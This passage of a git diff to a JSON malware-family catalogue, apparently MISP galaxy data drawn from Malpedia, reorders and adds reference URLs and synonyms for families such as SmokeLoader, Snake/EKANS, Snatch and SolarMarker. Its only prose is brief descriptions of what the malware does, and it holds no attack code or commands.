"https://research.openanalysis.net/smoke/smokeloader/loader/config/yara/triage/2022/08/25/smokeloader.html", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft", - "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://www.cert.pl/en/news/single/dissecting-smoke-loader/", "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://github.com/vc0RExor/Quick-Analysis/blob/main/SmokeLoader/SmokeLoader.md", - "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", - "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", - "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", - "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise", - "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.101_ENG.pdf", - "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/", - "https://m.alvar.es/2020/06/comparative-analysis-between-bindiff.html", - "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", - "https://www.silentpush.com/blog/privacy-tools-not-for-you", - "http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html", - "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", "https://m.alvar.es/2019/10/dynamic-imports-and-working-around.html", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities", - "http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html", - "https://m.alvar.es/2020/06/unpacking-smokeloader-and.html", - "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer", - "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html", - "https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://embee-research.ghost.io/smokeloader-analysis-with-procmon/", "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", - "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/", + "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/", "https://suvaditya.one/malware-analysis/smokeloader/", - "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", - "https://asec.ahnlab.com/en/33600/", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", + "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft", "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://asec.ahnlab.com/en/36634/", - "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html", - "https://securitynews.sonicwall.com/xmlpost/html-application-hta-files-are-being-used-to-distribute-smoke-loader-malware/", - "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", - "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd", - "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", "https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/", - "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://research.checkpoint.com/2019-resurgence-of-smokeloader/", + "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd", + "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/", + "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise", + "https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/", + "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html", "https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://www.cert.pl/en/news/single/dissecting-smoke-loader/", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", + "https://youtu.be/QOypldw6hnY?t=3237", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://m.alvar.es/2020/06/unpacking-smokeloader-and.html", + "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886", + "https://hatching.io/blog/tt-2020-08-27/", + "https://m.alvar.es/2020/06/comparative-analysis-between-bindiff.html", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer", + "https://unit42.paloaltonetworks.com/analysis-of-smoke-loader-in-new-tsunami-campaign/", + "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://github.com/vc0RExor/Quick-Analysis/blob/main/SmokeLoader/SmokeLoader.md", + "http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html", + "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", + "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html", + "https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities", + "https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html", + "https://asec.ahnlab.com/en/36634/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", + "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer", + "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", + "https://research.openanalysis.net/smoke/smokeloader/loader/config/yara/triage/2022/08/25/smokeloader.html", + "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://intel471.com/blog/privateloader-malware", + "https://www.silentpush.com/blog/privacy-tools-not-for-you", + "https://securitynews.sonicwall.com/xmlpost/html-application-hta-files-are-being-used-to-distribute-smoke-loader-malware/", + "https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view", + "https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US", + "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://asec.ahnlab.com/en/33600/", + "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/", + "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", + "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", + "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.101_ENG.pdf", + "https://x0r19x91.in/malware-analysis/smokeloader/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html" + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries" ], "synonyms": [ "Dofoil", @@ -44574,8 +46645,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", - "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", - "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" + "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/", + "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators" ], "synonyms": [ "Ismo" @@ -44590,8 +46661,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smrss32", - "https://www.youtube.com/watch?v=7gCU31ScJgk", - "https://www.bleepingcomputer.com/forums/t/623132/smrss32-encrypted-ransomware-help-support-how-to-decryptbmp/" + "https://www.bleepingcomputer.com/forums/t/623132/smrss32-encrypted-ransomware-help-support-how-to-decryptbmp/", + "https://www.youtube.com/watch?v=7gCU31ScJgk" ], "synonyms": [], "type": [] @@ -44617,31 +46688,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snake", - "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html", - "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", - "https://twitter.com/bad_packets/status/1270957214300135426", - "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", - "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware", - "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", - "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/", - "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/", - "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html", - "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", - "https://www.goggleheadedhacker.com/blog/post/22", - "https://twitter.com/milkr3am/status/1270019326976786432", - "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/", - "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", - "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017", - "https://www.0ffset.net/reverse-engineering/analysing-snake-ransomware/", - "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/", + "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017", + "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", + "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems", + "https://twitter.com/bad_packets/status/1270957214300135426", + "https://www.0ffset.net/reverse-engineering/analysing-snake-ransomware/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html", + "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md", + "https://twitter.com/milkr3am/status/1270019326976786432", + "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", + "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/", + "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/", + "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/", + "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware", + "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/", + "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md" + "https://www.goggleheadedhacker.com/blog/post/22" ], "synonyms": [ "EKANS", @@ -44657,18 +46728,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch", + "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", "https://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/", + "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access", - "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md", "https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://intel471.com/blog/a-brief-history-of-ta505", - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://twitter.com/VK_Intel/status/1191414501297528832", - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/" + "https://intel471.com/blog/a-brief-history-of-ta505" ], "synonyms": [], "type": [] @@ -44681,10 +46752,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatchcrypto", + "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/", + "https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/", "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/", "https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html", - "https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf", - "https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/" + "https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf" ], "synonyms": [], "type": [] @@ -44697,11 +46769,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", - "https://www.youtube.com/watch?v=k3sM88o_maM", "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", - "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/", + "https://www.youtube.com/watch?v=k3sM88o_maM", "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/", - "https://twitter.com/VK_Intel/status/898549340121288704" + "https://twitter.com/VK_Intel/status/898549340121288704", + "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/" ], "synonyms": [], "type": [] @@ -44729,12 +46801,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", - "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", - "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html", - "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf", + "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef", "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/", "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/", - "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef" + "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html", + "https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072" ], "synonyms": [ "Ursnif" @@ -44757,6 +46830,19 @@ "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", "value": "Snojan" }, + { + "description": "Information stealer, written in Rust.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snowflake_stealer", + "https://github.com/Finch4/Malware-Analysis-Reports/blob/master/SnowFlake%20Stealer/SnowFlake%20Stealer%20Analysis.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7ddfdf14-ec97-48ea-88a6-055147583dc3", + "value": "SnowFlake Stealer" + }, { "description": "", "meta": { @@ -44802,12 +46888,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/", - "https://twitter.com/VK_Intel/status/1201584107928653824", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/" + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://twitter.com/VK_Intel/status/1201584107928653824", + "https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [], "type": [] @@ -44820,9 +46906,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sockbot", - "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html", - "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf", "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/", + "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf", + "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html", "https://www.youtube.com/watch?v=CAMnuhg-Qos" ], "synonyms": [], @@ -44849,12 +46935,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "https://threatminer.org/report.php?q=Accenture-Goldfin-Security-Alert.pdf&y=2018", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://threatminer.org/report.php?q=Accenture-Goldfin-Security-Alert.pdf&y=2018" ], "synonyms": [ "BIRDDOG", @@ -44871,11 +46957,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster", "https://www.bleepingcomputer.com/news/security/chinese-hackers-abuse-vlc-media-player-to-launch-malware-loader/", - "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks", + "https://securelist.com/apt-trends-report-q1-2021/101967/", "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf", - "https://securelist.com/apt-trends-report-q1-2021/101967/" + "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks" ], "synonyms": [ "DelfsCake", @@ -44892,9 +46978,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", + "https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/", "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", - "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/", - "https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/" + "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" ], "synonyms": [ "Napolar" @@ -44905,28 +46991,29 @@ "value": "Solarbot" }, { - "description": "Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.\r\n\r\nSome of SolarMarker’s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims’ web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.\r\n\r\nThe malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.", + "description": "Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.\r\n\r\nSome of SolarMarker\u2019s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims\u2019 web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.\r\n\r\nThe malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker", - "https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/", - "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer", - "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more", - "https://unit42.paloaltonetworks.com/solarmarker-malware/", - "https://www.prodaft.com/m/reports/Solarmarker_TLPWHITEv2.pdf", + "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise", "https://twitter.com/MsftSecIntel/status/1403461397283950597", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/", - "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction", - "https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/", - "https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer", - "https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html", - "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/", "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/", - "https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire", + "https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/", "https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/", + "https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire", + "https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer", + "https://unit42.paloaltonetworks.com/solarmarker-malware/", + "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/", + "https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html", + "https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/", + "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction", + "https://www.prodaft.com/m/reports/Solarmarker_TLPWHITEv2.pdf", "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-solarmarker", - "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise" + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", + "https://embee-research.ghost.io/shodan-censys-queries/", + "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer", + "https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/", + "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more" ], "synonyms": [ "Jupyter", @@ -44983,9 +47070,9 @@ "meta": { "refs": [ 